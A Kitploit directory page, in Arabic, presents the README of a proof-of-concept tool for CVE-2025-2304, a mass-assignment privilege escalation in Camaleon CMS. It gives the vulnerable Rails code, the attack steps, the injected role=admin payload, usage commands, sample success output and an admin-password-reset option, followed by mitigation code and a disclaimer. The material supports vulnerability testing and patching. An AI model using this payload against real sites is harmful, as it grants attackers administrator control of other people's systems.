Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

إثبات المفهوم لـ CVE-2025-2304 — ثغرة حرجة (CVSS 9.4) لتصعيد الامتيازات عبر التخصيص الجماعي في Camaleon CMS.

عرض المستودع
103منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-2304 PoC - تصعيد الصلاحيات في Camaleon CMS

CVE CVSS Python License

إثبات المفهوم (PoC) لاستغلال CVE-2025-2304، وهي ثغرة خطيرة من نوع الإسناد الجماعي في Camaleon CMS تسمح بتصعيد الصلاحيات من مستخدمين محدودي الصلاحية إلى مسؤولين.

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 فهرس المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • التثبيت
  • الاستخدام
  • أمثلة
  • الإصدارات المتأثرة
  • التخفيف
  • إخلاء المسؤولية
  • المراجع
  • المؤلف

🔍 نظرة عامة

CVE-2025-2304 هي ثغرة خطيرة من نوع الإسناد الجماعي في Camaleon CMS، توجد في طريقة updated_ajax في UsersController. ينبع أصل الثغرة من استخدام الطريقة الخطيرة permit! في Rails، والتي تسمح بمرور جميع المعاملات دون أي تصفية.

يوضح إثبات المفهوم هذا كيف يمكن لمستخدم مصدّق بصلاحيات محدودة أن يرفع صلاحياته إلى مسؤول عن طريق حقن معاملات غير مصرح بها أثناء عمليات تغيير كلمة المرور.

نقاط CVSS: 9.4 (خطيرة)

🐛 تفاصيل الثغرة

السبب الجذري

يستخدم الكود الضعيف params.require(:user).permit! الذي يقبل جميع المعاملات المقدمة من المستخدم دون التحقق منها:

root@kitploit:~
def updated_ajax
  user_params = params.require(:user).permit!  # DANGEROUS!
  current_user.update(user_params)
end

الاستغلال

يمكن للمهاجم حقن معاملات إضافية مثل user[role]=admin إلى جانب حقول تغيير كلمة المرور المشروعة، مما يتسبب في تحديث التطبيق لدور المستخدم إلى مسؤول.

متجه الهجوم:

  1. تسجيل الدخول كمستخدم محدود الصلاحية (مثل دور "client")
  2. إرسال طلب POST معدل إلى /admin/users/{id}/updated_ajax
  3. حقن المعامل user[role]=admin
  4. ترقية دور المستخدم إلى مسؤول

✨ الميزات

  • ✅ اختبار آمن: يحافظ على كلمة مرور المستخدم أثناء الاستغلال
  • ✅ حمولات متعددة: يختبر أكثر من 7 تقنيات حقن مختلفة
  • ✅ كشف الإصدار: يكتشف تلقائياً إصدارات CMS المعرضة للثغرة
  • ✅ خيار غير مدمر: علامة --no-password-field لأكثر الاختبارات أماناً
  • ✅ دعم الوكيل: يتكامل مع Burp Suite/ZAP للتحليل اليدوي
  • ✅ وضع المفصل: مخرجات مفصلة لتصحيح الأخطاء
  • ✅ الاستيلاء على صلاحية المسؤول: هجوم اختياري لإعادة تعيين كلمة مرور المسؤول
  • ✅ مخرجات ملونة: مؤشرات بصرية واضحة للنجاح/الفشل

📦 التثبيت

المتطلبات

  • Python 3.7+
  • pip (مدير حزم Python)

استنساخ المستودع

root@kitploit:~
git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

تثبيت التبعيات

root@kitploit:~
pip install -r requirements.txt

أو التثبيت يدوياً:

root@kitploit:~
pip install requests beautifulsoup4

🚀 الاستخدام

البنية الأساسية

root@kitploit:~
python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

خيارات سطر الأوامر

root@kitploit:~
positional arguments:
  target                عنوان الهدف (مثال: http://target.com)

required arguments:
  -u, --username        اسم مستخدم موجود للمصادقة
  -p, --password        كلمة مرور المستخدم

optional arguments:
  -h, --help            عرض رسالة المساعدة والخروج
  -v, --verbose         مخرجات مفصلة (عرض جميع الطلبات)
  --proxy PROXY         وكيل HTTP لفحص حركة المرور (مثال: http://127.0.0.1:8080)
  --no-password-field   اختبار الاستغلال دون تضمين حقول كلمة المرور (الأكثر أماناً)
  --skip-admin-test     تخطي الاختبار التدميري لإعادة تعيين كلمة مرور المسؤول

📚 أمثلة

الاختبار القياسي (موصى به)

الاختبار باستخدام بيانات اعتماد مستخدم موجود مع الحفاظ على كلمة المرور:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

الاختبار الأكثر أماناً (بدون حقول كلمة المرور)

الاختبار دون تضمين حقول كلمة المرور في حمولة الاستغلال:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

مع وكيل Burp Suite

توجيه حركة المرور عبر Burp Suite للفحص اليدوي:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

وضع المفصل

تفعيل المخرجات المفصلة التي تعرض جميع الطلبات والاستجابات:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

تخطي الاختبارات التدميرية

اختبار تصعيد الصلاحيات فقط، وتخطي إعادة تعيين كلمة مرور المسؤول:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 نموذج مخرجات

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 الإصدارات المتأثرة

الإصدارالحالة
< 2.9.1❌ معرضة
≥ 2.9.1✅ مصححة

على وجه التحديد المعرضة:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x والإصدارات الأقدم

🛡️ التخفيف

الإجراءات الفورية

  1. الترقية إلى الإصدار 2.9.1 أو أحدث

    root@kitploit:~
    gem update camaleon_cms
    
  2. تدقيق حسابات المستخدمين

    • التحقق من تغييرات الصلاحيات غير المتوقعة
    • مراجعة سجلات تعديل أدوار المستخدمين
    • البحث عن طلبات POST مشبوهة إلى /users/*/updated_ajax
  3. فرض إعادة تعيين كلمات المرور (في حالة الاختراق)

    • إعادة تعيين كلمات المرور لجميع الحسابات ذات الصلاحيات
    • إبطال الجلسات الحالية

الوقاية طويلة المدى

نمط الكود الآمن:

استبدال permit! الخطير بقائمة بيضاء صريحة:

root@kitploit:~
# قبل (معرض)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# بعد (آمن)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

إجراءات أمنية إضافية:

  • تطبيق تصفية قوية للمعاملات عبر التطبيق بأكمله
  • إضافة سير عمل موافقة على تغيير الأدوار للعمليات الحرجة
  • تفعيل تسجيل التدقيق لتغييرات الصلاحيات
  • استخدام مبدأ أقل الصلاحيات
  • مراقبة محاولات الإسناد الجماعي عبر قواعد WAF

⚠️ إخلاء المسؤولية

هذه الأداة مقدمة لأغراض تعليمية واختبار أمني مصرح به فقط.

إشعار قانوني:

  • استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قوانين مثل:
    • قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) في الولايات المتحدة
    • قانون إساءة استخدام الكمبيوتر لعام 1990 في المملكة المتحدة
    • تشريعات مماثلة في ولايات قضائية أخرى
  • المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الضرر الناجم عن هذه الأداة
  • المستخدمون وحدهم مسؤولون عن أفعالهم

الاستخدام الأخلاقي:

  • الحصول على إذن مناسب قبل الاختبار
  • اتباع ممارسات الإفصاح المسؤولة
  • الاستخدام في مهام اختبار الاختراق بموافقة على النطاق
  • الأغراض التعليمية في بيئات المختبرات الخاضعة للرقابة فقط

📖 المراجع

  • إدخال CVE: CVE-2025-2304
  • تنبيه GHSA: GHSA-rp28-mvq3-wf8j
  • تنبيه البائع: Tenable Security Research TRA-2025-09
  • تعديل التصحيح: GitHub Commit 179fd6b
  • ملاحظات الإصدار: Camaleon CMS 2.9.1

👤 المؤلف

d3vn0mi

  • GitHub: @d3vn0mi
  • الموقع الشخصي: @d3vn0mi
  • المدونة الشخصية: @d3vn0mi

📝 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

🤝 المساهمة

المساهمات والقضايا وطلبات الميزات مرحّب بها!

لا تتردد في زيارة صفحة القضايا.

⭐ أظهر دعمك

اعطِ ⭐️ إذا كان هذا المشروع قد ساعدك!


ملحوظة: هذا المستودع لأغراض البحث الأمني والتعليم. التزم دائماً بممارسات الإفصاح المسؤول واحصل على إذن مناسب قبل الاختبار.

تنزيل الأداة